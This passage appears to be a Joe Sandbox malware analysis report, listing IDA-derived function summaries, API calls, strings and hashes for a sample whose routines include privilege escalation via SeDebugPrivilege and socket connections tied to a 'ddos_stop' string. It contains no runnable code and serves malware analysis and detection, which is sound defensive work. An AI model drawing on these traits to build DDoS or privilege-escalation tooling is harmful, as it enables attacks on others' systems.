                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: connect
                            • String ID:
                            • API String ID: 1959786783-0
                            • Opcode ID: f08251cb2a754f7f2434fc7b6e2151aa4a8a2ff67c4da2180d2909c61758b2f6
                            • Instruction ID: 94b5bfe2314bff8fdf9ce2e0ce22ba35234059b5c56646d24ec5b8d3069aba9e
                            • Opcode Fuzzy Hash: f08251cb2a754f7f2434fc7b6e2151aa4a8a2ff67c4da2180d2909c61758b2f6
                            • Instruction Fuzzy Hash: 89E08631601914678A1066B86C518E9775A8F80B79B04C716BE3D4B7D0CA35DC9096D4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00434FF1
                              • Part of subcall function 0041369B: __EH_prolog.LIBCMT ref: 004136A0
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: d886ce0dca7cabb51cc6dc78e2b46fa8716ba0fa1f3bf03dbec5e83667a22732
                            • Instruction ID: a6a17074417603aca11d58167767c08cca39a4181a89d4965a13cf8e3d3d3d66
                            • Opcode Fuzzy Hash: d886ce0dca7cabb51cc6dc78e2b46fa8716ba0fa1f3bf03dbec5e83667a22732
                            • Instruction Fuzzy Hash: 09F030B0C1025899CB10EFE9D8452EEBEB8AF19744F10500FF404B3251D7B80745CBE9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 0041EB52
                              • Part of subcall function 00413F8D: std::_Cnd_initX.LIBCPMT ref: 00413F93
                              • Part of subcall function 00413F8D: __Cnd_signal.LIBCPMT ref: 00413F9F
                              • Part of subcall function 00413F8D: std::_Cnd_initX.LIBCPMT ref: 00413FB4
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Cnd_initstd::_$Cnd_signalH_prolog
                            • String ID:
                            • API String ID: 3262714529-0
                            • Opcode ID: 4c40e73f0aaf95d7acdd14b120c88f9a9f93be81a4d81b41f757aeb24bf6ab4e
                            • Instruction ID: 6ec64e20ddbb1a917344458e8d6a88660199dbb73029c05b273ebe62639c58e9
                            • Opcode Fuzzy Hash: 4c40e73f0aaf95d7acdd14b120c88f9a9f93be81a4d81b41f757aeb24bf6ab4e
                            • Instruction Fuzzy Hash: 96E01271955214DBDB18AF9494067DDB7B4EF04335F20078EF494662C2CB7556028799
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • WSAStartup.WS2_32(00000002,00000002), ref: 004107D9
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Startup
                            • String ID:
                            • API String ID: 724789610-0
                            • Opcode ID: f12ed0640048525d821b22233eadc94aaa0895087cee4c8538a79ba317e0a674
                            • Instruction ID: e110cca691539e17059a820ccb334c71c76e8421bb90a4e7a02472f114fcb635
                            • Opcode Fuzzy Hash: f12ed0640048525d821b22233eadc94aaa0895087cee4c8538a79ba317e0a674
                            • Instruction Fuzzy Hash: 02D02B309252144FC710E6385C06575739EE707331F200335DC76C11C0F90858114AC5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • std::_Deallocate.LIBCONCRT ref: 00411B20
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Deallocatestd::_
                            • String ID:
                            • API String ID: 1323251999-0
                            • Opcode ID: 4240533d9f262ce9e2afb649e3049b21eef5bca52de13571118af7fd312099d0
                            • Instruction ID: a5bb6f8230b63ef1b743cc28815be57c126bffb7c95fa9de15f62f736ad40a87
                            • Opcode Fuzzy Hash: 4240533d9f262ce9e2afb649e3049b21eef5bca52de13571118af7fd312099d0
                            • Instruction Fuzzy Hash: 67D017715102118FD370DF28D940B92B7E4EF04300F10483EA4C8D2660E275A8C0CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00413FC6
                              • Part of subcall function 00583288: __Thrd_current.LIBCPMT ref: 0058329A
                              • Part of subcall function 00583288: __Mtx_unlock.LIBCPMT ref: 005832E6
                              • Part of subcall function 00583288: __Cnd_broadcast.LIBCPMT ref: 005832F1
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Cnd_broadcastCnd_do_broadcast_at_thread_exitMtx_unlockThrd_current
                            • String ID:
                            • API String ID: 3770271663-0
                            • Opcode ID: 3f8eb422f8433fb0099226f869301b37e91ae3a0cf73d807ab6ed0381c822d4a
                            • Instruction ID: ff022d793bb8bf46b6e52066ac2f291b08853f54aaa20664c344421b08025672
                            • Opcode Fuzzy Hash: 3f8eb422f8433fb0099226f869301b37e91ae3a0cf73d807ab6ed0381c822d4a
                            • Instruction Fuzzy Hash: 2EC092352142089F8340FBB8D44A81A7BE8AF95B107504079BD068BA21DE31BE14CA96
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00422D70
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • GetLastError.KERNEL32(?,0078835C,?,004AB6F7,80004005,007A29C4,?,004F4CC6,00000000,?,4s,?,?,004F508D), ref: 00422D76
                              • Part of subcall function 00422D5E: LoadResource.KERNEL32(?,?,4s,?,?,8007000E,?,?,?,004AB6F7,80004005,007A29C4,?,004F4CC6,00000000), ref: 00422DD7
                              • Part of subcall function 00422D5E: LockResource.KERNEL32(00000000,007A29C4,?,?,4s,?,?,8007000E,?,?,?,004AB6F7,80004005,007A29C4,?,004F4CC6), ref: 00422DE3
                              • Part of subcall function 00422D5E: SizeofResource.KERNEL32(?,?,?,?,4s,?,?,8007000E,?,?,?,004AB6F7,80004005,007A29C4,?,004F4CC6), ref: 00422DF1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Resource$ErrorExceptionException@8LastLoadLockRaiseSizeofThrow
                            • String ID: 4s
                            • API String ID: 294969344-1257959787
                            • Opcode ID: 14b93b8610f04b95de01a3b08f1d8995d8b73e4958a1c2cc6fbb48db3d2eb4bc
                            • Instruction ID: e2ff399347e63724e1a48493567a94bfb53cd13b7b159f511e72fd9b16053eda
                            • Opcode Fuzzy Hash: 14b93b8610f04b95de01a3b08f1d8995d8b73e4958a1c2cc6fbb48db3d2eb4bc
                            • Instruction Fuzzy Hash: 3E218731300334BB9B346A69BE88ABB779CDE40340790492BFD06E7210D9F8DC8091E9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,0000007F,?,?,?,?,0047E90F), ref: 0047E77A
                            • OpenProcessToken.ADVAPI32(00000000,?,?,0000007F,?,?,?,?,0047E90F), ref: 0047E781
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,0047E90F), ref: 0047E795
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?,0000007F), ref: 0047E7C5
                            • CloseHandle.KERNEL32(?,?,?,0000007F,?,?,?,?,0047E90F), ref: 0047E7D0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                            • String ID: SeDebugPrivilege
                            • API String ID: 3038321057-2896544425
                            • Opcode ID: 0c29f445ca04c2798a4101f98d1b68dfa0cfbf5040bcb354011ccd277078b067
                            • Instruction ID: aace4f5f6edd183b133fdf4e4701db54a5bb30bb7a59a62e2ce5c2b82c276aab
                            • Opcode Fuzzy Hash: 0c29f445ca04c2798a4101f98d1b68dfa0cfbf5040bcb354011ccd277078b067
                            • Instruction Fuzzy Hash: AA01E975D01219AFEB109BE59C49EEFBBBCEF09750F004556B904E6290DBB49A05CBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: d
                            • API String ID: 1302938615-2564639436
                            • Opcode ID: 92f3a314f94aee7bf3664951fd0aa7892cd7bea82081848237beda51ead6e1f3
                            • Instruction ID: 2a29e47dfeb645cbba4989c50d10ac3a17c78e97e4c22e969295b565acbb20f5
                            • Opcode Fuzzy Hash: 92f3a314f94aee7bf3664951fd0aa7892cd7bea82081848237beda51ead6e1f3
                            • Instruction Fuzzy Hash: 91E1B7A9A0D2D09EDF06DF6DB4A11ADBF739B5A201708C0DAC9D54B323C5384D11D77A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateFileW.KERNEL32(005D004B,00000000,00000007,00000000,00000003,02200000,00000000,2D5DBC68,?,00000000,?,005D004B,?), ref: 005CF243
                            • new.LIBCMT ref: 005CF263
                            • DeviceIoControl.KERNEL32 ref: 005CF291
                            • CloseHandle.KERNEL32(00000000), ref: 005CF2D0
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseControlCreateDeviceFileHandle
                            • String ID:
                            • API String ID: 33631002-0
                            • Opcode ID: f815ece0dc1aabffd2dd344dfdbfec935579e43d4fd7ba11b451de3cb1166dd9
                            • Instruction ID: 364d7e8f96c196a85623c56f144f71f59c499aa789fc39dfd9d813af084301b4
                            • Opcode Fuzzy Hash: f815ece0dc1aabffd2dd344dfdbfec935579e43d4fd7ba11b451de3cb1166dd9
                            • Instruction Fuzzy Hash: EB210D79A84304BFE7608F94DC4AF997FA9FB05724F200229F915AB2C0D7B45A04C7A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004BAF61
                            • ___from_strstr_to_strchr.LIBCMT ref: 004BB048
                              • Part of subcall function 004BC47A: __EH_prolog.LIBCMT ref: 004BC47F
                              • Part of subcall function 004BD4BA: __EH_prolog.LIBCMT ref: 004BD4BF
                            Strings
                            • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_, xrefs: 004BB043
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$___from_strstr_to_strchr
                            • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
                            • API String ID: 423314503-3812731148
                            • Opcode ID: f7944ef7c53056260a9f4d1e851776a17f0ce83f9c86b73060d9863230577118
                            • Instruction ID: 20005f4af06ca05258a67fcc0cc7a6772db13b2771217b54e43b06ac8c3df241
                            • Opcode Fuzzy Hash: f7944ef7c53056260a9f4d1e851776a17f0ce83f9c86b73060d9863230577118
                            • Instruction Fuzzy Hash: 3DD1B07060060AAFDB19DF28C495BFABBE1FF44304F14419AE8558B351C7B8E862DBB5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004B8B70
                            • GetProcessHeap.KERNEL32(00000000,00000060,?,?,00000000), ref: 004B8B84
                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004B8B8B
                              • Part of subcall function 0040F438: __EH_prolog.LIBCMT ref: 0040F43D
                              • Part of subcall function 004B0DE2: __CxxThrowException@8.LIBVCRUNTIME ref: 004B0DFC
                              • Part of subcall function 004B0DE2: __EH_prolog.LIBCMT ref: 004B0E07
                              • Part of subcall function 004B0DE2: GetProcessHeap.KERNEL32(00000000,00000040), ref: 004B0E1B
                              • Part of subcall function 004B0DE2: HeapAlloc.KERNEL32(00000000), ref: 004B0E22
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$H_prolog$AllocProcess$Exception@8Throw
                            • String ID:
                            • API String ID: 366758686-0
                            • Opcode ID: 1f2dc041dcf747c3e80210d5c6422096e2b3a00b93f2d3bf26ed929f5451a444
                            • Instruction ID: 6a4b64ab387b7b43378e0e3dd9749b4186d1dcc24dccc6994ed67e7ae1b888d3
                            • Opcode Fuzzy Hash: 1f2dc041dcf747c3e80210d5c6422096e2b3a00b93f2d3bf26ed929f5451a444
                            • Instruction Fuzzy Hash: 07118FB1D05248EADB01DBA9C949BDEFFF8EF54304F10409EE504AB242D7B95B04CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • FindFirstFileExW.KERNEL32(?,00000000,00000220,00000000,00000000,00000000,?,00000000,76CDFA50,00426975,?,?,00000000,00000000,?,00000000), ref: 004269EC
                            • GetLastError.KERNEL32(?,00000000,76CDFA50,00426975,?,?,00000000,00000000,?,00000000,00000000,00000000), ref: 00426A11
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorFileFindFirstLast
                            • String ID:
                            • API String ID: 873889042-0
                            • Opcode ID: 3f47211a3d1292322d94dd9ffac7f2ed8caf95052f2821213890d616a833dccf
                            • Instruction ID: 7476eb702744dd527e45b7fff867582633ed137c3c2e3e9643eb08402786ddb1
                            • Opcode Fuzzy Hash: 3f47211a3d1292322d94dd9ffac7f2ed8caf95052f2821213890d616a833dccf
                            • Instruction Fuzzy Hash: 91F0BBF13443109BE3305A79ACC8FA37959E785328F91491FF25AA61D0CBB49C464674
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8c3f7e1f18e3c7d79d3b64c130862757a094c5a6eed26b047f490793c0227657
                            • Instruction ID: a81d5ed95a12d33e288bf159931503bdfebec61ba3c2220e1b971e36f664e6c7
                            • Opcode Fuzzy Hash: 8c3f7e1f18e3c7d79d3b64c130862757a094c5a6eed26b047f490793c0227657
                            • Instruction Fuzzy Hash: 42312477A14285CFC308CF6D5C823A9BF60FBE2200B04866AE845E72C2D2755515C75C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __swprintf.LEGACY_STDIO_DEFINITIONS ref: 00526C17
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __swprintf
                            • String ID: Assertion failed$Autotrace call$Backtrace$Bad argument$Bad flag (parameter or structure field)$Bad number of channels$Bad parameter of type CvPoint$Bad type of mask argument$Division by zero occured$Formats of input arguments do not match$Gpu API call$Image step is wrong$Incorrect size of input array$Inplace operation is not supported$Input COI is not supported$Input image depth is not supported by function$Insufficient memory$Internal error$Iterations do not converge$Memory block has been corrupted$No Error$No GPU support$No OpenGL support$Null pointer$One of arguments' values is out of range$OpenGL API call$Parsing error$Requested object was not found$Sizes of input arguments do not match$The function/feature is not implemented$Unknown %s code %d$Unspecified error$Unsupported format or combination of formats$error$status
                            • API String ID: 1857805200-1549692122
                            • Opcode ID: f3631eacad4194858451593ae7bd8c722872eccafc81514b0dc3c4b03d3a3f41
                            • Instruction ID: 53b4af2ab741bcb213036afcfe5f3fbf30b126f3875418c0a415ac75eb0e4bf0
                            • Opcode Fuzzy Hash: f3631eacad4194858451593ae7bd8c722872eccafc81514b0dc3c4b03d3a3f41
                            • Instruction Fuzzy Hash: DC21C62DA0086587BF2CD23C696453D2480FED63A4FEC47B6F569D3EE3C25D8D412146
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004188AF
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 004188BA
                            • gethostbyname.WS2_32(?), ref: 004188EE
                            • _strlen.LIBCMT ref: 004189A8
                            • htons.WS2_32(00000000), ref: 004189DE
                            • socket.WS2_32(00000002,00000001,00000006), ref: 004189FB
                            • setsockopt.WS2_32(00000000,0000FFFF,00001006,000003E8,00000004), ref: 00418A1B
                            • connect.WS2_32(00000000,?,00000010), ref: 00418AC1
                              • Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeallocateExceptionException@8H_prologRaiseThrow_strlenconnectgethostbynamehtonssetsockoptsocketstd::_
                            • String ID: ($-$b$ddos_stop
                            • API String ID: 1589026174-1644948824
                            • Opcode ID: d030039adcfefc39ff552d71692db85e7638fbcd0444616a72680111de9ec893
                            • Instruction ID: 212e067d65c976a6134065eda8ad71f5aa434052f10650b04c9e458efc0c0cbd
                            • Opcode Fuzzy Hash: d030039adcfefc39ff552d71692db85e7638fbcd0444616a72680111de9ec893
                            • Instruction Fuzzy Hash: FEB12271900248AEEB10DFA8DC85BEDBBB8BF19304F10416FF505A71A1EB786E84CB55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: _strlen$DeallocateH_prolog__onexitstd::_
                            • String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
                            • API String ID: 1696903463-4081904993
                            • Opcode ID: af21ac0c3349518e03e9c0a97a6a29a60763bb2630f6d3d132fcf1b85d4f83fb
                            • Instruction ID: 15fbb3c951a0cf78df6a900232873ff12f33c2b58c4e3dc235cfb68bbab15b2e
                            • Opcode Fuzzy Hash: af21ac0c3349518e03e9c0a97a6a29a60763bb2630f6d3d132fcf1b85d4f83fb
                            • Instruction Fuzzy Hash: 56518371C05298EEEB50EBA9D841BEDBBF4AF55300F2041AEE518F7282DA741F44CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: _strlen$DeallocateH_prolog__onexitstd::_
                            • String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
                            • API String ID: 1696903463-4081904993
                            • Opcode ID: a502132f9bdcc661911187c7b261428a046e5161712a956ae8707acb270d792b
                            • Instruction ID: 4e1a102844bff2765a4901dda53e7d72d31fbbcdeb7d9b590e8ec79db0352fad
                            • Opcode Fuzzy Hash: a502132f9bdcc661911187c7b261428a046e5161712a956ae8707acb270d792b
                            • Instruction Fuzzy Hash: 2C517571C05298AEEF50EBA9D841BEDBBF4AF55300F2040AEE518F7282DA741E44CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: _strlen$DeallocateH_prolog__onexitstd::_
                            • String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
                            • API String ID: 1696903463-4081904993
                            • Opcode ID: 1e4644023c9992da43a2cb2b98ea07c198e1b5b0ad44e104de559c95366cbb47
                            • Instruction ID: 820a24787a4c911dc0989f6c5ac4e6f79867204f4eee875757e2da9dc1641ecf
                            • Opcode Fuzzy Hash: 1e4644023c9992da43a2cb2b98ea07c198e1b5b0ad44e104de559c95366cbb47
                            • Instruction Fuzzy Hash: A0517371C05298AEEB50EBA9D841BEDBBF4AF55300F1040AEE519F7282DA741F44CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: _strlen$DeallocateH_prolog__onexitstd::_
                            • String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
                            • API String ID: 1696903463-4081904993
                            • Opcode ID: b9a957b2389aa0897cf7aa7ec02f18bc469a2dc7ec67a8160a25da426074ea73
                            • Instruction ID: f0ce4762724f2496d363b9ff8ce18a79b1f23062014612d5764ce21e7d78337e
                            • Opcode Fuzzy Hash: b9a957b2389aa0897cf7aa7ec02f18bc469a2dc7ec67a8160a25da426074ea73
                            • Instruction Fuzzy Hash: 73518470C05298AEEF50EBA9D841BEDBBF4AF55304F1040AEE518F7282DA781F44CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: _strlen$DeallocateH_prolog__onexitstd::_
                            • String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
                            • API String ID: 1696903463-4081904993
                            • Opcode ID: dcdb5ea9b330c9cb4dd82f9d21394d1d0b22953e23a1d8ddc4016b525ba65ab4
                            • Instruction ID: 82927464066e5d64ad563dfa16edb15fe9c21c111162d48adc6cf5b025f25bcb
                            • Opcode Fuzzy Hash: dcdb5ea9b330c9cb4dd82f9d21394d1d0b22953e23a1d8ddc4016b525ba65ab4
                            • Instruction Fuzzy Hash: 40518570C05298AEEF51EBA9D841BEDBBF4AF55300F1040AEE518F7282DA741F44CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: _strlen$DeallocateH_prolog__onexitstd::_
                            • String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
                            • API String ID: 1696903463-4081904993
                            • Opcode ID: c5fd530577b98ccdccfa11f9fa4b4edca678a025bdc8d3f406937387bf29b6d9
                            • Instruction ID: eaae416ebb35603555c3f789ceabeecb30c4b6f400c3e9e5542155036aaf6c01
                            • Opcode Fuzzy Hash: c5fd530577b98ccdccfa11f9fa4b4edca678a025bdc8d3f406937387bf29b6d9
                            • Instruction Fuzzy Hash: 83518570C05298AEEB50EBA9D8417EDBBF4AF55300F1040AEE515F7282DA741F44CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: _strlen$DeallocateH_prolog__onexitstd::_
